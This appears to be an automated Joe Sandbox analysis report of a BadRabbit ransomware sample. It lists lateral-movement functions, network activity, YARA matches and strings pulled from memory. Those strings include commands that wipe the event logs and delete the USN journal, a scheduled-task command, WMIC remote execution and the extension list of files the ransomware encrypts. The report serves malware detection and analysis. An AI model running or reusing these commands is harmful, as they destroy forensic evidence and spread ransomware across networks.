Source: Binary string: lsasrv.pdbUGP source: 2594.tmp, 0000000B.00000003.1719410656.0000000002EF6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000002.00000003.1717652685.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696516164.0000000002C9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1754801710.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696854067.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.2.dr

Spreading

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04859534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, \\%s\admin$ 2_2_04859534
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04859B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$ 2_2_04859B63
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04855E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,2_2_04855E9F
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF1B80 PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,PathFindExtensionW,FindNextFileW,FindClose,23_2_00DF1B80

Networking

        Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 192.168.2.0 139
        Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 192.168.2.1 80
        Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 173.222.162.32 445
        Source: Joe Sandbox View IP Address: 173.222.162.32
        Source: Joe Sandbox View ASN Name: AKAMAI-ASUS
        Source: global traffic TCP traffic: 192.168.2.4:49675 -> 173.222.162.32:443
        Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32 (11 occurrences)
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04851CA3 GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,GetProcessHeap,HeapAlloc,htons,send,recv,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
        Source: global traffic DNS traffic detected: DNS query: api.msn.com
        Source: global traffic DNS traffic detected: DNS query: tse1.mm.bing.net
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1/
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1/;
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1/E
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1/W
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1/d
        Source: rundll32.exe, 00000002.00000002.1763336798.0000000004955000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1:80/top
        Source: download.exe, cscc.dat.2.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
        Source: rundll32.exe, 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1717652685.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696516164.0000000002C9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1754801710.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696854067.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000017.00000000.1746771759.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp, dispci.exe.2.dr, cscc.dat.2.dr String found in binary or memory: http://diskcryptor.net/
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
        Source: qmgr.db.32.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
        Source: qmgr.db.32.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
        Source: qmgr.db.32.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: download.exe, cscc.dat.2.dr String found in binary or memory: http://ocsp.thawte.com0
        Source: download.exe String found in binary or memory: http://rb.symcb.com/rb.crl0W
        Source: download.exe String found in binary or memory: http://rb.symcb.com/rb.crt0
        Source: download.exe String found in binary or memory: http://rb.symcd.com0&
        Source: download.exe String found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: download.exe String found in binary or memory: http://s.symcd.com0
        Source: download.exe String found in binary or memory: http://s.symcd.com06
        Source: download.exe String found in binary or memory: http://sf.symcb.com/sf.crl0W
        Source: download.exe String found in binary or memory: http://sf.symcb.com/sf.crt0
        Source: download.exe String found in binary or memory: http://sf.symcd.com0&
        Source: download.exe String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: download.exe, cscc.dat.2.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
        Source: download.exe String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: download.exe, cscc.dat.2.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
        Source: download.exe, cscc.dat.2.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
        Source: download.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: download.exe String found in binary or memory: https://d.symcb.com/cps0%
        Source: download.exe String found in binary or memory: https://d.symcb.com/rpa0
        Source: download.exe String found in binary or memory: https://d.symcb.com/rpa0.
        Source: download.exe String found in binary or memory: https://d.symcb.com/rpa06
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCFF000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCE8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
        Source: svchost.exe, 00000020.00000003.1762376215.00000111AFC72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
        Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: C:\Windows\dispci.exe Code function: 23_2_00DF42A0 SetWindowsHookExW 00000002,Function_00003FC0,00000000,00000000
        Source: C:\Windows\dispci.exe Code function: 23_2_00DF4070 GetDesktopWindow,GetForegroundWindow,GetShellWindow,GetCapture,GetClipboardOwner,GetOpenClipboardWindow,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetFocus,GetActiveWindow,GetKBCodePage,GetCursor,GetLastActivePopup,GetProcessHeap,GetQueueStatus,GetInputState,GetMessageTime,GetOEMCP,GetCursorInfo,GetCaretPos,GetCurrentThread,GetThreadTimes,GetCurrentProcess,GetCurrentProcess,GetProcessTimes,GetCurrentProcess,K32GetProcessMemoryInfo,QueryPerformanceCounter,GlobalMemoryStatusEx,EnumWindows

        Spam, unwanted Advertisements and Ransom Demands

        Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7412, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: dispci.exe PID: 8032, type: MEMORYSTR
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_048515A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext

        System Summary

        Source: download.exe, type: SAMPLE Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 0.2.download.exe.10ce578.1.unpack, type: UNPACKEDPE Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 0.0.download.exe.c00000.0.unpack, type: UNPACKEDPE Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 0.2.download.exe.c00000.0.unpack, type: UNPACKEDPE Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 11.0.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPE Matched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
        Source: 2.3.rundll32.exe.2cb4d60.1.unpack, type: UNPACKEDPE Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 11.2.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPE Matched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
        Source: 2.2.rundll32.exe.2cb4d60.0.unpack, type: UNPACKEDPE Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 2.3.rundll32.exe.2cb4d60.2.unpack, type: UNPACKEDPE Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 2.3.rundll32.exe.2cb4d60.0.unpack, type: UNPACKEDPE Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 23.2.dispci.exe.df0000.0.unpack, type: UNPACKEDPE Matched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: 23.2.dispci.exe.df0000.0.unpack, type: UNPACKEDPE Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 23.0.dispci.exe.df0000.0.unpack, type: UNPACKEDPE Matched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: 23.0.dispci.exe.df0000.0.unpack, type: UNPACKEDPE Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 2.3.rundll32.exe.2cb4d60.2.raw.unpack, type: UNPACKEDPE Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 2.3.rundll32.exe.2cb4d60.1.raw.unpack, type: UNPACKEDPE Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 2.3.rundll32.exe.2cb4d60.0.raw.unpack, type: UNPACKEDPE Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 2.2.rundll32.exe.2cb4d60.0.raw.unpack, type: UNPACKEDPE Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 0.2.download.exe.10ce578.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPE Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPE Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPE Matched rule: BadRabbit Payload Author: kevoreilly
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPE Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPE Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPE Matched rule: BadRabbit Payload Author: kevoreilly
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPE Matched rule: BadRabbit Payload Author: kevoreilly
        Source: 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: C:\Windows\dispci.exe, type: DROPPED Matched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: C:\Windows\dispci.exe, type: DROPPED Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: C:\Windows\cscc.dat, type: DROPPED Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32memstr_f19e9d61-d
        Source: C:\Windows\2594.tmp Code function: 11_2_00007FF73CFC214C GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb
        Source: C:\Windows\2594.tmp Code function: 11_2_00007FF73CFC1864 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,LocalAlloc,NtQuerySystemInformation,LocalFree
        Source: C:\Windows\dispci.exe Code function: 23_2_00DF2020 TlsGetValue,CreateFileW,TlsSetValue,DeviceIoControl,GetLastError
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04859534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04859B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04858A23 InitiateSystemShutdownExW,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\download.exe File created: C:\Windows\infpub.dat
        Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\cscc.dat
        Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\dispci.exe
        Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\2594.tmp
        Source: C:\Windows\dispci.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
        Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Windows\SysWOW64\rundll32.exe File deleted: C:\Windows\infpub.dat
        Source: C:\Users\user\Desktop\download.exe Code function: 0_2_00C03840
        Source: C:\Users\user\Desktop\download.exe Code function: 0_2_00C0201D
        Source: C:\Users\user\Desktop\download.exe Code function: 0_2_00C030E3
        Source: C:\Users\user\Desktop\download.exe Code function: 0_2_00C0173C
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0485A83C
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0485C1E3
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04852708
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0485B11D
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0485C940
        Source: C:\Windows\2594.tmp Code function: 11_2_00007FF73CFC5C00
        Source: C:\Windows\dispci.exe Code function: 23_2_00E018BC
        Source: C:\Windows\dispci.exe Code function: 23_2_00E00C8F
        Source: C:\Windows\dispci.exe Code function: 23_2_00DF2800
        Source: C:\Windows\dispci.exe Code function: 23_2_00E011E0
        Source: C:\Windows\dispci.exe Code function: 23_2_00E025F4
        Source: C:\Windows\dispci.exe Code function: 23_2_00DF82CA
        Source: C:\Windows\dispci.exe Code function: 23_2_00E0073E
        Source: Joe Sandbox View Dropped File: C:\Windows\cscc.dat 0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
        Source: C:\Windows\SysWOW64\wevtutil.exe Process token adjusted: Security
        Source: download.exe Static PE information: invalid certificate
        Source: download.exe, 00000000.00000002.1694487596.00000000010BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlashUtil.exev+ vs download.exe
        Source: download.exe, 00000000.00000000.1692531626.0000000000C09000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFlashUtil.exev+ vs download.exe
        Source: download.exe Binary or memory string: OriginalFilenameFlashUtil.exev+ vs download.exe
        Source: unknown Driver loaded: C:\Windows\System32\cdd.dll
        Source: download.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: download.exe, type: SAMPLE Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.download.exe.10ce578.1.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.0.download.exe.c00000.0.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.download.exe.c00000.0.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.0.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.3.rundll32.exe.2cb4d60.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 11.2.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2cb4d60.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 2.3.rundll32.exe.2cb4d60.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 2.3.rundll32.exe.2cb4d60.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 23.2.dispci.exe.df0000.0.unpack, type: UNPACKEDPE Matched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: 23.2.dispci.exe.df0000.0.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 23.0.dispci.exe.df0000.0.unpack, type: UNPACKEDPE Matched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
